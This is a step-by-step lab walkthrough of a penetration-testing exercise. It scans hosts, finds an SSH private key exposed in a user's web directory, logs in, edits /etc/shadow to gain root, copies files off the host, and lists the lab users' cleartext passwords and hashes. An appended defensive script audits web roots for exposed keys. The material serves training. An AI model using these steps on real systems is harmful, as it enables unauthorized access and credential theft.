- nmap -n 192.168.2.1-255
- nmap -n -sV -sS -O 192.168.2.100
- nmap -n -sV -sS -O 192.168.2.101
- firefox 192.168.2.100
- [+]kate -> list of possible usernames. Save. Filename: usernames.txt
- firefox 192.168.2.101
- [+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' in front. -> http://192.168.2.101 -> 80
- firefox 192.168.2.101/~pirrip
- [+]kate -> Update usernames with the ones which we got a response from. Save.
- [+]BackTrack -> Web Application Analysis -> Web (frontend) -> nikto2
- ./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
- firefox 192.168.2.101/~pirrip/.ssh
- // Save both files
- mv /root/id_rsa /root/.ssh/id_rsa
- mv /root/id_rsa.pub /root/.ssh/id_rsa.pub
- chmod 000 /root/.ssh/id_rsa
- chmod 000 /root/.ssh/id_rsa.pub
- ssh pirrip@192.168.2.100
- // Yes
- mailx
- // 3 - we see that havisham's password is 'changeme'. 7 - we see pirrip's password is '0l1v3rTw1st'
- cd /etc/
- vi passwd
- // kate -> Update usernames with only valid ones.
- vi group
- sudo vi shadow
- // edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
- su
- // Password: 0l1v3rTw1st
- cd /root/
- ls -a
- cd .save/
- ls -a
- chmod -R 777 /root/
- //In BackTrack//
- scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
- unzip great_expectations.zip
- tar xf great_expectations.tar
- strings Jan08
- //In SSH//
- sudo vi /var/mail/havisham
- modprobe capability
- //In BackTrack//
- ftp 192.168.2.100
- // Username: pirrip. Password: 0l1v3rTw1st //
- ls -a
- //In SSH//
- exit
- //In BackTrack//
- [+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
- // GAME OVER
- ----------------------------------------------------------------------------------------------------
- Users
- root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
- havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
- pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
- magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
- ----------------------------------------------------------------------------------------------------
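From the defender's side, the pivot in these notes is the SSH key pair readable over HTTP at ~pirrip/.ssh. The following added example (not part of the original paste) audits per-user web roots for that exposure; the public_html layout, the function names and the sample users alice and bob are assumptions.

```sh
#!/bin/sh
# Added defensive example; not part of the original paste.
# Assumption: per-user web content is served from <home>/public_html
# (pass "." as the second argument if whole home directories are served).

# audit_userdir_keys HOME_BASE [WEB_SUBDIR]
# Prints one finding per line: "SSH_DIR <path>" or "PRIVATE_KEY <path>".
audit_userdir_keys() {
    base=$1
    sub=${2:-public_html}
    for home in "$base"/*/; do
        root=${home%/}/$sub
        [ -d "$root" ] || continue
        # A .ssh directory under a web root is a finding by itself.
        find "$root" -type d -name .ssh | while IFS= read -r d; do
            printf 'SSH_DIR %s\n' "$d"
        done
        # Small files whose first line is a PEM/OpenSSH private-key header.
        find "$root" -type f -size -65536c | while IFS= read -r f; do
            if head -n 1 "$f" 2>/dev/null |
                grep -q -- '-----BEGIN .*PRIVATE KEY-----'; then
                printf 'PRIVATE_KEY %s\n' "$f"
            fi
        done
    done
}

# Builds a constructed sample tree (hypothetical users alice and bob) and
# prints its path, so the audit can be tried without touching real homes.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/alice/public_html/.ssh" "$t/bob/public_html"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'constructed-not-a-key' \
        > "$t/alice/public_html/.ssh/id_rsa"
    printf '<html>hello</html>\n' > "$t/bob/public_html/index.html"
    printf '%s\n' "$t"
}
```

Run it as `audit_userdir_keys /home` on the web server; any output line is something the HTTP daemon can hand to an unauthenticated client.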